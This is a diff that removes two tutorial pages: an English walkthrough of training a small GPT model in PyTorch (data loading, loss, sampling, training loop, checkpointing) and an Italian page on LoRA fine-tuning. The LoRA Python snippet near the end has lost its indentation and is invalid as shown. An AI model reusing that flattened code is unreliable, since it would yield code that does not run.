-            nn.Linear(cfg["emb_dim"], 4 * cfg["emb_dim"]),
-            GELU(),
-            nn.Linear(4 * cfg["emb_dim"], cfg["emb_dim"]),
-        )
-
-    def forward(self, x):
-        return self.layers(x)
-
-
-class TransformerBlock(nn.Module):
-    def __init__(self, cfg):
-        super().__init__()
-        self.att = MultiHeadAttention(
-            d_in=cfg["emb_dim"],
-            d_out=cfg["emb_dim"],
-            context_length=cfg["context_length"],
-            num_heads=cfg["n_heads"],
-            dropout=cfg["drop_rate"],
-            qkv_bias=cfg["qkv_bias"])
-        self.ff = FeedForward(cfg)
-        self.norm1 = LayerNorm(cfg["emb_dim"])
-        self.norm2 = LayerNorm(cfg["emb_dim"])
-        self.drop_shortcut = nn.Dropout(cfg["drop_rate"])
-
-    def forward(self, x):
-        # Shortcut connection for attention block
-        shortcut = x
-        x = self.norm1(x)
-        x = self.att(x)   # Shape [batch_size, num_tokens, emb_size]
-        x = self.drop_shortcut(x)
-        x = x + shortcut  # Add the original input back
-
-        # Shortcut connection for feed-forward block
-        shortcut = x
-        x = self.norm2(x)
-        x = self.ff(x)
-        x = self.drop_shortcut(x)
-        x = x + shortcut  # Add the original input back
-
-        return x
-
-
-class GPTModel(nn.Module):
-    def __init__(self, cfg):
-        super().__init__()
-        self.tok_emb = nn.Embedding(cfg["vocab_size"], cfg["emb_dim"])
-        self.pos_emb = nn.Embedding(cfg["context_length"], cfg["emb_dim"])
-        self.drop_emb = nn.Dropout(cfg["drop_rate"])
-
-        self.trf_blocks = nn.Sequential(
-            *[TransformerBlock(cfg) for _ in range(cfg["n_layers"])])
-
-        self.final_norm = LayerNorm(cfg["emb_dim"])
-        self.out_head = nn.Linear(cfg["emb_dim"], cfg["vocab_size"], bias=False)
-
-    def forward(self, in_idx):
-        batch_size, seq_len = in_idx.shape
-        tok_embeds = self.tok_emb(in_idx)
-        pos_embeds = self.pos_emb(torch.arange(seq_len, device=in_idx.device))
-        x = tok_embeds + pos_embeds  # Shape [batch_size, num_tokens, emb_size]
-        x = self.drop_emb(x)
-        x = self.trf_blocks(x)
-        x = self.final_norm(x)
-        logits = self.out_head(x)
-        return logits
-```
-
-</details>
-
-```python
-# Download contents to train the data with
-import os
-import urllib.request
-
-file_path = "the-verdict.txt"
-url = "https://raw.githubusercontent.com/rasbt/LLMs-from-scratch/main/ch02/01_main-chapter-code/the-verdict.txt"
-
-if not os.path.exists(file_path):
-    with urllib.request.urlopen(url) as response:
-        text_data = response.read().decode('utf-8')
-    with open(file_path, "w", encoding="utf-8") as file:
-        file.write(text_data)
-else:
-    with open(file_path, "r", encoding="utf-8") as file:
-        text_data = file.read()
-
-total_characters = len(text_data)
-tokenizer = tiktoken.get_encoding("gpt2")
-total_tokens = len(tokenizer.encode(text_data))
-
-print("Data downloaded")
-print("Characters:", total_characters)
-print("Tokens:", total_tokens)
-
-# Model initialization
-GPT_CONFIG_124M = {
-    "vocab_size": 50257,   # Vocabulary size
-    "context_length": 256, # Shortened context length (orig: 1024)
-    "emb_dim": 768,        # Embedding dimension
-    "n_heads": 12,         # Number of attention heads
-    "n_layers": 12,        # Number of layers
-    "drop_rate": 0.1,      # Dropout rate
-    "qkv_bias": False      # Query-key-value bias
-}
-
-torch.manual_seed(123)
-model = GPTModel(GPT_CONFIG_124M)
-model.eval()
-print ("Model initialized")
-
-
-# Functions to transform from tokens to ids and from to ids to tokens
-def text_to_token_ids(text, tokenizer):
-    encoded = tokenizer.encode(text, allowed_special={'<|endoftext|>'})
-    encoded_tensor = torch.tensor(encoded).unsqueeze(0) # add batch dimension
-    return encoded_tensor
-
-def token_ids_to_text(token_ids, tokenizer):
-    flat = token_ids.squeeze(0) # remove batch dimension
-    return tokenizer.decode(flat.tolist())
-
-
-
-# Define loss functions
-def calc_loss_batch(input_batch, target_batch, model, device):
-    input_batch, target_batch = input_batch.to(device), target_batch.to(device)
-    logits = model(input_batch)
-    loss = torch.nn.functional.cross_entropy(logits.flatten(0, 1), target_batch.flatten())
-    return loss
-
-
-def calc_loss_loader(data_loader, model, device, num_batches=None):
-    total_loss = 0.
-    if len(data_loader) == 0:
-        return float("nan")
-    elif num_batches is None:
-        num_batches = len(data_loader)
-    else:
-        # Reduce the number of batches to match the total number of batches in the data loader
-        # if num_batches exceeds the number of batches in the data loader
-        num_batches = min(num_batches, len(data_loader))
-    for i, (input_batch, target_batch) in enumerate(data_loader):
-        if i < num_batches:
-            loss = calc_loss_batch(input_batch, target_batch, model, device)
-            total_loss += loss.item()
-        else:
-            break
-    return total_loss / num_batches
-
-
-# Apply Train/validation ratio and create dataloaders
-train_ratio = 0.90
-split_idx = int(train_ratio * len(text_data))
-train_data = text_data[:split_idx]
-val_data = text_data[split_idx:]
-
-torch.manual_seed(123)
-
-train_loader = create_dataloader_v1(
-    train_data,
-    batch_size=2,
-    max_length=GPT_CONFIG_124M["context_length"],
-    stride=GPT_CONFIG_124M["context_length"],
-    drop_last=True,
-    shuffle=True,
-    num_workers=0
-)
-
-val_loader = create_dataloader_v1(
-    val_data,
-    batch_size=2,
-    max_length=GPT_CONFIG_124M["context_length"],
-    stride=GPT_CONFIG_124M["context_length"],
-    drop_last=False,
-    shuffle=False,
-    num_workers=0
-)
-
-
-# Sanity checks
-if total_tokens * (train_ratio) < GPT_CONFIG_124M["context_length"]:
-    print("Not enough tokens for the training loader. "
-          "Try to lower the `GPT_CONFIG_124M['context_length']` or "
-          "increase the `training_ratio`")
-
-if total_tokens * (1-train_ratio) < GPT_CONFIG_124M["context_length"]:
-    print("Not enough tokens for the validation loader. "
-          "Try to lower the `GPT_CONFIG_124M['context_length']` or "
-          "decrease the `training_ratio`")
-
-print("Train loader:")
-for x, y in train_loader:
-    print(x.shape, y.shape)
-
-print("\nValidation loader:")
-for x, y in val_loader:
-    print(x.shape, y.shape)
-
-train_tokens = 0
-for input_batch, target_batch in train_loader:
-    train_tokens += input_batch.numel()
-
-val_tokens = 0
-for input_batch, target_batch in val_loader:
-    val_tokens += input_batch.numel()
-
-print("Training tokens:", train_tokens)
-print("Validation tokens:", val_tokens)
-print("All tokens:", train_tokens + val_tokens)
-
-
-# Indicate the device to use
-if torch.cuda.is_available():
-    device = torch.device("cuda")
-elif torch.backends.mps.is_available():
-    device = torch.device("mps")
-else:
-    device = torch.device("cpu")
-
-print(f"Using {device} device.")
-
-model.to(device) # no assignment model = model.to(device) necessary for nn.Module classes
-
-
-
-# Pre-calculate losses without starting yet
-torch.manual_seed(123) # For reproducibility due to the shuffling in the data loader
-
-with torch.no_grad(): # Disable gradient tracking for efficiency because we are not training, yet
-    train_loss = calc_loss_loader(train_loader, model, device)
-    val_loss = calc_loss_loader(val_loader, model, device)
-
-print("Training loss:", train_loss)
-print("Validation loss:", val_loss)
-
-
-# Functions to train the data
-def train_model_simple(model, train_loader, val_loader, optimizer, device, num_epochs,
-                       eval_freq, eval_iter, start_context, tokenizer):
-    # Initialize lists to track losses and tokens seen
-    train_losses, val_losses, track_tokens_seen = [], [], []
-    tokens_seen, global_step = 0, -1
-
-    # Main training loop
-    for epoch in range(num_epochs):
-        model.train()  # Set model to training mode
-
-        for input_batch, target_batch in train_loader:
-            optimizer.zero_grad() # Reset loss gradients from previous batch iteration
-            loss = calc_loss_batch(input_batch, target_batch, model, device)
-            loss.backward() # Calculate loss gradients
-            optimizer.step() # Update model weights using loss gradients
-            tokens_seen += input_batch.numel()
-            global_step += 1
-
-            # Optional evaluation step
-            if global_step % eval_freq == 0:
-                train_loss, val_loss = evaluate_model(
-                    model, train_loader, val_loader, device, eval_iter)
-                train_losses.append(train_loss)
-                val_losses.append(val_loss)
-                track_tokens_seen.append(tokens_seen)
-                print(f"Ep {epoch+1} (Step {global_step:06d}): "
-                      f"Train loss {train_loss:.3f}, Val loss {val_loss:.3f}")
-
-        # Print a sample text after each epoch
-        generate_and_print_sample(
-            model, tokenizer, device, start_context
-        )
-
-    return train_losses, val_losses, track_tokens_seen
-
-
-def evaluate_model(model, train_loader, val_loader, device, eval_iter):
-    model.eval()
-    with torch.no_grad():
-        train_loss = calc_loss_loader(train_loader, model, device, num_batches=eval_iter)
-        val_loss = calc_loss_loader(val_loader, model, device, num_batches=eval_iter)
-    model.train()
-    return train_loss, val_loss
-
-
-def generate_and_print_sample(model, tokenizer, device, start_context):
-    model.eval()
-    context_size = model.pos_emb.weight.shape[0]
-    encoded = text_to_token_ids(start_context, tokenizer).to(device)
-    with torch.no_grad():
-        token_ids = generate_text(
-            model=model, idx=encoded,
-            max_new_tokens=50, context_size=context_size
-        )
-    decoded_text = token_ids_to_text(token_ids, tokenizer)
-    print(decoded_text.replace("\n", " "))  # Compact print format
-    model.train()
-
-
-# Start training!
-import time
-start_time = time.time()
-
-torch.manual_seed(123)
-model = GPTModel(GPT_CONFIG_124M)
-model.to(device)
-optimizer = torch.optim.AdamW(model.parameters(), lr=0.0004, weight_decay=0.1)
-
-num_epochs = 10
-train_losses, val_losses, tokens_seen = train_model_simple(
-    model, train_loader, val_loader, optimizer, device,
-    num_epochs=num_epochs, eval_freq=5, eval_iter=5,
-    start_context="Every effort moves you", tokenizer=tokenizer
-)
-
-end_time = time.time()
-execution_time_minutes = (end_time - start_time) / 60
-print(f"Training completed in {execution_time_minutes:.2f} minutes.")
-
-
-
-# Show graphics with the training process
-import matplotlib.pyplot as plt
-from matplotlib.ticker import MaxNLocator
-import math
-def plot_losses(epochs_seen, tokens_seen, train_losses, val_losses):
-    fig, ax1 = plt.subplots(figsize=(5, 3))
-    ax1.plot(epochs_seen, train_losses, label="Training loss")
-    ax1.plot(
-        epochs_seen, val_losses, linestyle="-.", label="Validation loss"
-    )
-    ax1.set_xlabel("Epochs")
-    ax1.set_ylabel("Loss")
-    ax1.legend(loc="upper right")
-    ax1.xaxis.set_major_locator(MaxNLocator(integer=True))
-    ax2 = ax1.twiny()
-    ax2.plot(tokens_seen, train_losses, alpha=0)
-    ax2.set_xlabel("Tokens seen")
-    fig.tight_layout()
-    plt.show()
-
-    # Compute perplexity from the loss values
-    train_ppls = [math.exp(loss) for loss in train_losses]
-    val_ppls = [math.exp(loss) for loss in val_losses]
-    # Plot perplexity over tokens seen
-    plt.figure()
-    plt.plot(tokens_seen, train_ppls, label='Training Perplexity')
-    plt.plot(tokens_seen, val_ppls, label='Validation Perplexity')
-    plt.xlabel('Tokens Seen')
-    plt.ylabel('Perplexity')
-    plt.title('Perplexity over Training')
-    plt.legend()
-    plt.show()
-
-epochs_tensor = torch.linspace(0, num_epochs, len(train_losses))
-plot_losses(epochs_tensor, tokens_seen, train_losses, val_losses)
-
-
-torch.save({
-    "model_state_dict": model.state_dict(),
-    "optimizer_state_dict": optimizer.state_dict(),
-    },
-"/tmp/model_and_optimizer.pth"
-)
-```
-
-Let's see an explanation step by step
-
-### Functions to transform text <--> ids
-
-These are some simple functions that can be used to transform from texts from the vocabulary to ids and backwards. This is needed at the begging of the handling of the text and at the end fo the predictions:
-
-```python
-# Functions to transform from tokens to ids and from to ids to tokens
-def text_to_token_ids(text, tokenizer):
-    encoded = tokenizer.encode(text, allowed_special={'<|endoftext|>'})
-    encoded_tensor = torch.tensor(encoded).unsqueeze(0) # add batch dimension
-    return encoded_tensor
-
-def token_ids_to_text(token_ids, tokenizer):
-    flat = token_ids.squeeze(0) # remove batch dimension
-    return tokenizer.decode(flat.tolist())
-```
-
-### Generate text functions
-
-In a previos section a function that just got the **most probable token** after getting the logits. However, this will mean that for each entry the same output is always going to be generated which makes it very deterministic.
-
-The following `generate_text` function, will apply the `top-k` , `temperature` and `multinomial` concepts.
-
- The **`top-k`** means that we will start reducing to `-inf` all the probabilities of all the tokens expect of the top k tokens. So, if k=3, before making a decision only the 3 most probably tokens will have a probability different from `-inf`.
- The **`temperature`** means that every probability will be divided by the temperature value. A value of `0.1` will improve the highest probability compared with the lowest one, while a temperature of `5` for example will make it more flat. This helps to improve to variation in responses we would like the LLM to have.
- After applying the temperature, a **`softmax`** function is applied again to make all the reminding tokens have a total probability of 1.
- Finally, instead of choosing the token with the biggest probability, the function **`multinomial`** is applied to **predict the next token according to the final probabilities**. So if token 1 had a 70% of probabilities, token 2 a 20% and token 3 a 10%, 70% of the times token 1 will be selected, 20% of the times it will be token 2 and 10% of the times will be 10%.
-
-```python
-# Generate text function
-def generate_text(model, idx, max_new_tokens, context_size, temperature=0.0, top_k=None, eos_id=None):
-
-    # For-loop is the same as before: Get logits, and only focus on last time step
-    for _ in range(max_new_tokens):
-        idx_cond = idx[:, -context_size:]
-        with torch.no_grad():
-            logits = model(idx_cond)
-        logits = logits[:, -1, :]
-
-        # New: Filter logits with top_k sampling
-        if top_k is not None:
-            # Keep only top_k values
-            top_logits, _ = torch.topk(logits, top_k)
-            min_val = top_logits[:, -1]
-            logits = torch.where(logits < min_val, torch.tensor(float("-inf")).to(logits.device), logits)
-
-        # New: Apply temperature scaling
-        if temperature > 0.0:
-            logits = logits / temperature
-
-            # Apply softmax to get probabilities
-            probs = torch.softmax(logits, dim=-1)  # (batch_size, context_len)
-
-            # Sample from the distribution
-            idx_next = torch.multinomial(probs, num_samples=1)  # (batch_size, 1)
-
-        # Otherwise same as before: get idx of the vocab entry with the highest logits value
-        else:
-            idx_next = torch.argmax(logits, dim=-1, keepdim=True)  # (batch_size, 1)
-
-        if idx_next == eos_id:  # Stop generating early if end-of-sequence token is encountered and eos_id is specified
-            break
-
-        # Same as before: append sampled index to the running sequence
-        idx = torch.cat((idx, idx_next), dim=1)  # (batch_size, num_tokens+1)
-
-    return idx
-```
-
-> [!NOTE]
-> There is a common alternative to `top-k` called [**`top-p`**](https://en.wikipedia.org/wiki/Top-p_sampling), also known as nucleus sampling, which instead of getting k samples with the most probability, it **organizes** all the resulting **vocabulary** by probabilities and **sums** them from the highest probability to the lowest until a **threshold is reached**.
->
-> Then, **only those words** of the vocabulary will be considered according to their relative probabilities&#x20;
->
-> This allows to not need to select a number of `k` samples, as the optimal k might be different on each case, but **only a threshold**.
->
-> _Note that this improvement isn't included in the previous code._
-
-> [!NOTE]
-> Another way to improve the generated text is by using **Beam search** instead of the greedy search sued in this example.\
-> Unlike greedy search, which selects the most probable next word at each step and builds a single sequence, **beam search keeps track of the top 𝑘 k highest-scoring partial sequences** (called "beams") at each step. By exploring multiple possibilities simultaneously, it balances efficiency and quality, increasing the chances of **finding a better overall** sequence that might be missed by the greedy approach due to early, suboptimal choices.
->
-> _Note that this improvement isn't included in the previous code._
-
-### Loss functions
-
-The **`calc_loss_batch`** function calculates the cross entropy of the a prediction of a single batch.\
-The **`calc_loss_loader`** gets the cross entropy of all the batches and calculates the **average cross entropy**.
-
-```python
-# Define loss functions
-def calc_loss_batch(input_batch, target_batch, model, device):
-    input_batch, target_batch = input_batch.to(device), target_batch.to(device)
-    logits = model(input_batch)
-    loss = torch.nn.functional.cross_entropy(logits.flatten(0, 1), target_batch.flatten())
-    return loss
-
-def calc_loss_loader(data_loader, model, device, num_batches=None):
-    total_loss = 0.
-    if len(data_loader) == 0:
-        return float("nan")
-    elif num_batches is None:
-        num_batches = len(data_loader)
-    else:
-        # Reduce the number of batches to match the total number of batches in the data loader
-        # if num_batches exceeds the number of batches in the data loader
-        num_batches = min(num_batches, len(data_loader))
-    for i, (input_batch, target_batch) in enumerate(data_loader):
-        if i < num_batches:
-            loss = calc_loss_batch(input_batch, target_batch, model, device)
-            total_loss += loss.item()
-        else:
-            break
-    return total_loss / num_batches
-```
-
-> [!NOTE]
-> **Gradient clipping** is a technique used to enhance **training stability** in large neural networks by setting a **maximum threshold** for gradient magnitudes. When gradients exceed this predefined `max_norm`, they are scaled down proportionally to ensure that updates to the model’s parameters remain within a manageable range, preventing issues like exploding gradients and ensuring more controlled and stable training.
->
-> _Note that this improvement isn't included in the previous code._
->
-> Check the following example:
-
-<figure><img src="../../images/image (6) (1).png" alt=""><figcaption></figcaption></figure>
-
-### Loading Data
-
-The functions `create_dataloader_v1` and `create_dataloader_v1` were already discussed in a previous section.
-
-From here note how it's defined that 90% of the text is going to be used for training while the 10% will be used for validation and both sets are stored in 2 different data loaders.\
-Note that some times part of the data set is also left for a testing set to evaluate better the performance of the model.
-
-Both data loaders are using the same batch size, maximum length and stride and num workers (0 in this case).\
-The main differences are the data used by each, and the the validators is not dropping the last neither shuffling the data is it's not needed for validation purposes.
-
-Also the fact that **stride is as big as the context length**, means that there won't be overlapping between contexts used to train the data (reduces overfitting but also the training data set).
-
-Moreover, note that the batch size in this case it 2 to divide the data in 2 batches, the main goal of this is to allow parallel processing and reduce the consumption per batch.
-
-```python
-train_ratio = 0.90
-split_idx = int(train_ratio * len(text_data))
-train_data = text_data[:split_idx]
-val_data = text_data[split_idx:]
-
-torch.manual_seed(123)
-
-train_loader = create_dataloader_v1(
-    train_data,
-    batch_size=2,
-    max_length=GPT_CONFIG_124M["context_length"],
-    stride=GPT_CONFIG_124M["context_length"],
-    drop_last=True,
-    shuffle=True,
-    num_workers=0
-)
-
-val_loader = create_dataloader_v1(
-    val_data,
-    batch_size=2,
-    max_length=GPT_CONFIG_124M["context_length"],
-    stride=GPT_CONFIG_124M["context_length"],
-    drop_last=False,
-    shuffle=False,
-    num_workers=0
-)
-```
-
-## Sanity Checks
-
-The goal is to check there are enough tokens for training, shapes are the expected ones and get some info about the number of tokens used for training and for validation:
-
-```python
-# Sanity checks
-if total_tokens * (train_ratio) < GPT_CONFIG_124M["context_length"]:
-    print("Not enough tokens for the training loader. "
-          "Try to lower the `GPT_CONFIG_124M['context_length']` or "
-          "increase the `training_ratio`")
-
-if total_tokens * (1-train_ratio) < GPT_CONFIG_124M["context_length"]:
-    print("Not enough tokens for the validation loader. "
-          "Try to lower the `GPT_CONFIG_124M['context_length']` or "
-          "decrease the `training_ratio`")
-
-print("Train loader:")
-for x, y in train_loader:
-    print(x.shape, y.shape)
-
-print("\nValidation loader:")
-for x, y in val_loader:
-    print(x.shape, y.shape)
-
-train_tokens = 0
-for input_batch, target_batch in train_loader:
-    train_tokens += input_batch.numel()
-
-val_tokens = 0
-for input_batch, target_batch in val_loader:
-    val_tokens += input_batch.numel()
-
-print("Training tokens:", train_tokens)
-print("Validation tokens:", val_tokens)
-print("All tokens:", train_tokens + val_tokens)
-```
-
-### Select device for training & pre calculations
-
-The following code just select the device to use and calculates a training loss and validation loss (without having trained anything yet) as a starting point.
-
-```python
-# Indicate the device to use
-
-if torch.cuda.is_available():
-    device = torch.device("cuda")
-elif torch.backends.mps.is_available():
-    device = torch.device("mps")
-else:
-    device = torch.device("cpu")
-
-print(f"Using {device} device.")
-
-model.to(device) # no assignment model = model.to(device) necessary for nn.Module classes
-
-# Pre-calculate losses without starting yet
-torch.manual_seed(123) # For reproducibility due to the shuffling in the data loader
-
-with torch.no_grad(): # Disable gradient tracking for efficiency because we are not training, yet
-    train_loss = calc_loss_loader(train_loader, model, device)
-    val_loss = calc_loss_loader(val_loader, model, device)
-
-print("Training loss:", train_loss)
-print("Validation loss:", val_loss)
-```
-
-### Training functions
-
-The function `generate_and_print_sample` will just get a context and generate some tokens in order to get a feeling about how good is the model at that point. This is called by `train_model_simple` on each step.
-
-The function `evaluate_model` is called as frequently as indicate to the training function and it's used to measure the train loss and the validation loss at that point in the model training.
-
-Then the big function `train_model_simple` is the one that actually train the model. It expects:
-
- The train data loader (with the data already separated and prepared for training)
- The validator loader
- The **optimizer** to use during training: This is the function that will use the gradients and will update the parameters to reduce the loss. In this case, as you will see, `AdamW` is used, but there are many more.
-  - `optimizer.zero_grad()` is called to reset the gradients on each round to not accumulate them.
-  - The **`lr`** param is the **learning rate** which determines the **size of the steps** taken during the optimization process when updating the model's parameters. A **smaller** learning rate means the optimizer **makes smaller updates** to the weights, which can lead to more **precise** convergence but might **slow down** training. A **larger** learning rate can speed up training but **risks overshooting** the minimum of the loss function (**jump over** the point where the loss function is minimized).
-  - **Weight Decay** modifies the **Loss Calculation** step by adding an extra term that penalizes large weights. This encourages the optimizer to find solutions with smaller weights, balancing between fitting the data well and keeping the model simple preventing overfitting in machine learning models by discouraging the model from assigning too much importance to any single feature.
-    - Traditional optimizers like SGD with L2 regularization couple weight decay with the gradient of the loss function. However, **AdamW** (a variant of Adam optimizer) decouples weight decay from the gradient update, leading to more effective regularization.
- The device to use for training
- The number of epochs: Number of times to go over the training data
- The evaluation frequency: The frequency to call `evaluate_model`
- The evaluation iteration: The number of batches to use when evaluating the current state of the model when calling `generate_and_print_sample`
- The start context: Which the starting sentence to use when calling `generate_and_print_sample`
- The tokenizer
-
-```python
-# Functions to train the data
-def train_model_simple(model, train_loader, val_loader, optimizer, device, num_epochs,
-                       eval_freq, eval_iter, start_context, tokenizer):
-    # Initialize lists to track losses and tokens seen
-    train_losses, val_losses, track_tokens_seen = [], [], []
-    tokens_seen, global_step = 0, -1
-
-    # Main training loop
-    for epoch in range(num_epochs):
-        model.train()  # Set model to training mode
-
-        for input_batch, target_batch in train_loader:
-            optimizer.zero_grad() # Reset loss gradients from previous batch iteration
-            loss = calc_loss_batch(input_batch, target_batch, model, device)
-            loss.backward() # Calculate loss gradients
-            optimizer.step() # Update model weights using loss gradients
-            tokens_seen += input_batch.numel()
-            global_step += 1
-
-            # Optional evaluation step
-            if global_step % eval_freq == 0:
-                train_loss, val_loss = evaluate_model(
-                    model, train_loader, val_loader, device, eval_iter)
-                train_losses.append(train_loss)
-                val_losses.append(val_loss)
-                track_tokens_seen.append(tokens_seen)
-                print(f"Ep {epoch+1} (Step {global_step:06d}): "
-                      f"Train loss {train_loss:.3f}, Val loss {val_loss:.3f}")
-
-        # Print a sample text after each epoch
-        generate_and_print_sample(
-            model, tokenizer, device, start_context
-        )
-
-    return train_losses, val_losses, track_tokens_seen
-
-
-def evaluate_model(model, train_loader, val_loader, device, eval_iter):
-    model.eval() # Set in eval mode to avoid dropout
-    with torch.no_grad():
-        train_loss = calc_loss_loader(train_loader, model, device, num_batches=eval_iter)
-        val_loss = calc_loss_loader(val_loader, model, device, num_batches=eval_iter)
-    model.train() # Back to training model applying all the configurations
-    return train_loss, val_loss
-
-
-def generate_and_print_sample(model, tokenizer, device, start_context):
-    model.eval() # Set in eval mode to avoid dropout
-    context_size = model.pos_emb.weight.shape[0]
-    encoded = text_to_token_ids(start_context, tokenizer).to(device)
-    with torch.no_grad():
-        token_ids = generate_text(
-            model=model, idx=encoded,
-            max_new_tokens=50, context_size=context_size
-        )
-    decoded_text = token_ids_to_text(token_ids, tokenizer)
-    print(decoded_text.replace("\n", " "))  # Compact print format
-    model.train() # Back to training model applying all the configurations
-```
-
-> [!NOTE]
-> To improve the learning rate there are a couple relevant techniques called **linear warmup** and **cosine decay.**
->
-> **Linear warmup** consist on define an initial learning rate and a maximum one and consistently update it after each epoch. This is because starting the training with smaller weight updates decreases the risk of the model encountering large, destabilizing updates during its training phase.\
-> **Cosine decay** is a technique that **gradually reduces the learning rate** following a half-cosine curve **after the warmup** phase, slowing weight updates to **minimize the risk of overshooting** the loss minima and ensure training stability in later phases.
->
-> _Note that these improvements aren't included in the previous code._
-
-### Start training
-
-```python
-import time
-start_time = time.time()
-
-torch.manual_seed(123)
-model = GPTModel(GPT_CONFIG_124M)
-model.to(device)
-optimizer = torch.optim.AdamW(model.parameters(), lr=0.0004, weight_decay=0.1)
-
-num_epochs = 10
-train_losses, val_losses, tokens_seen = train_model_simple(
-    model, train_loader, val_loader, optimizer, device,
-    num_epochs=num_epochs, eval_freq=5, eval_iter=5,
-    start_context="Every effort moves you", tokenizer=tokenizer
-)
-
-end_time = time.time()
-execution_time_minutes = (end_time - start_time) / 60
-print(f"Training completed in {execution_time_minutes:.2f} minutes.")
-```
-
-### Print training evolution
-
-With the following function it's possible to print the evolution of the model while it was being trained.
-
-```python
-import matplotlib.pyplot as plt
-from matplotlib.ticker import MaxNLocator
-import math
-def plot_losses(epochs_seen, tokens_seen, train_losses, val_losses):
-    fig, ax1 = plt.subplots(figsize=(5, 3))
-    ax1.plot(epochs_seen, train_losses, label="Training loss")
-    ax1.plot(
-        epochs_seen, val_losses, linestyle="-.", label="Validation loss"
-    )
-    ax1.set_xlabel("Epochs")
-    ax1.set_ylabel("Loss")
-    ax1.legend(loc="upper right")
-    ax1.xaxis.set_major_locator(MaxNLocator(integer=True))
-    ax2 = ax1.twiny()
-    ax2.plot(tokens_seen, train_losses, alpha=0)
-    ax2.set_xlabel("Tokens seen")
-    fig.tight_layout()
-    plt.show()
-
-    # Compute perplexity from the loss values
-    train_ppls = [math.exp(loss) for loss in train_losses]
-    val_ppls = [math.exp(loss) for loss in val_losses]
-    # Plot perplexity over tokens seen
-    plt.figure()
-    plt.plot(tokens_seen, train_ppls, label='Training Perplexity')
-    plt.plot(tokens_seen, val_ppls, label='Validation Perplexity')
-    plt.xlabel('Tokens Seen')
-    plt.ylabel('Perplexity')
-    plt.title('Perplexity over Training')
-    plt.legend()
-    plt.show()
-
-epochs_tensor = torch.linspace(0, num_epochs, len(train_losses))
-plot_losses(epochs_tensor, tokens_seen, train_losses, val_losses)
-```
-
-### Save the model
-
-It's possible to save the model + optimizer if you want to continue training later:
-
-```python
-# Save the model and the optimizer for later training
-torch.save({
-    "model_state_dict": model.state_dict(),
-    "optimizer_state_dict": optimizer.state_dict(),
-    },
-"/tmp/model_and_optimizer.pth"
-)
-# Note that this model with the optimizer occupied close to 2GB
-
-# Restore model and optimizer for training
-checkpoint = torch.load("/tmp/model_and_optimizer.pth", map_location=device)
-
-model = GPTModel(GPT_CONFIG_124M)
-model.load_state_dict(checkpoint["model_state_dict"])
-optimizer = torch.optim.AdamW(model.parameters(), lr=5e-4, weight_decay=0.1)
-optimizer.load_state_dict(checkpoint["optimizer_state_dict"])
-model.train(); # Put in training mode
-```
-
-Or just the model if you are planing just on using it:
-
-```python
-# Save the model
-torch.save(model.state_dict(), "model.pth")
-
-# Load it
-model = GPTModel(GPT_CONFIG_124M)
-
-model.load_state_dict(torch.load("model.pth", map_location=device))
-
-model.eval() # Put in eval mode
-```
-
-## Loading GPT2 weights
-
-There 2 quick scripts to load the GPT2 weights locally. For both you can clone the repository [https://github.com/rasbt/LLMs-from-scratch](https://github.com/rasbt/LLMs-from-scratch) locally, then:
-
- The script [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/gpt_generate.py](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/gpt_generate.py) will download all the weights and transform the formats from OpenAI to the ones expected by our LLM. The script is also prepared with the needed configuration and with the prompt: "Every effort moves you"
- The script [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/02_alternative_weight_loading/weight-loading-hf-transformers.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/02_alternative_weight_loading/weight-loading-hf-transformers.ipynb) allows you to load any of the GPT2 weights locally (just change the `CHOOSE_MODEL` var) and predict text from some prompts.
-
-## References
-
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
-
--- a/src/todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md
+++ b/src/todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md
@ -1,61 +0,0 @@
-# 7.0. Miglioramenti LoRA nel fine-tuning
-
-## Miglioramenti LoRA
-
-> [!TIP]
-> L'uso di **LoRA riduce notevolmente il calcolo** necessario per **fine-tunare** modelli già addestrati.
-
-LoRA rende possibile il fine-tuning di **grandi modelli** in modo efficiente cambiando solo una **piccola parte** del modello. Riduce il numero di parametri che devi addestrare, risparmiando **memoria** e **risorse computazionali**. Questo perché:
-
-1. **Riduce il Numero di Parametri Allenabili**: Invece di aggiornare l'intera matrice dei pesi nel modello, LoRA **divide** la matrice dei pesi in due matrici più piccole (chiamate **A** e **B**). Questo rende l'addestramento **più veloce** e richiede **meno memoria** perché devono essere aggiornati meno parametri.
-
-1. Questo perché invece di calcolare l'aggiornamento completo dei pesi di uno strato (matrice), lo approssima a un prodotto di 2 matrici più piccole riducendo l'aggiornamento da calcolare:\
-
-<figure><img src="../../images/image (9) (1).png" alt=""><figcaption></figcaption></figure>
-
-2. **Mantiene Invariati i Pesi del Modello Originale**: LoRA ti consente di mantenere i pesi del modello originale invariati e aggiorna solo le **nuove piccole matrici** (A e B). Questo è utile perché significa che la conoscenza originale del modello è preservata e modifichi solo ciò che è necessario.
-3. **Fine-Tuning Efficiente Specifico per Compiti**: Quando vuoi adattare il modello a un **nuovo compito**, puoi semplicemente addestrare le **piccole matrici LoRA** (A e B) lasciando il resto del modello com'è. Questo è **molto più efficiente** rispetto a riaddestrare l'intero modello.
-4. **Efficienza di Archiviazione**: Dopo il fine-tuning, invece di salvare un **nuovo modello intero** per ogni compito, devi solo memorizzare le **matrici LoRA**, che sono molto piccole rispetto all'intero modello. Questo rende più facile adattare il modello a molti compiti senza utilizzare troppo spazio di archiviazione.
-
-Per implementare LoraLayers invece di quelli Lineari durante un fine-tuning, questo codice è proposto qui [https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb):
-```python
-import math
-
-# Create the LoRA layer with the 2 matrices and the alpha
-class LoRALayer(torch.nn.Module):
-def __init__(self, in_dim, out_dim, rank, alpha):
-super().__init__()
-self.A = torch.nn.Parameter(torch.empty(in_dim, rank))
-torch.nn.init.kaiming_uniform_(self.A, a=math.sqrt(5))  # similar to standard weight initialization
-self.B = torch.nn.Parameter(torch.zeros(rank, out_dim))
-self.alpha = alpha
-
-def forward(self, x):
-x = self.alpha * (x @ self.A @ self.B)
-return x
-
-# Combine it with the linear layer
-class LinearWithLoRA(torch.nn.Module):
-def __init__(self, linear, rank, alpha):
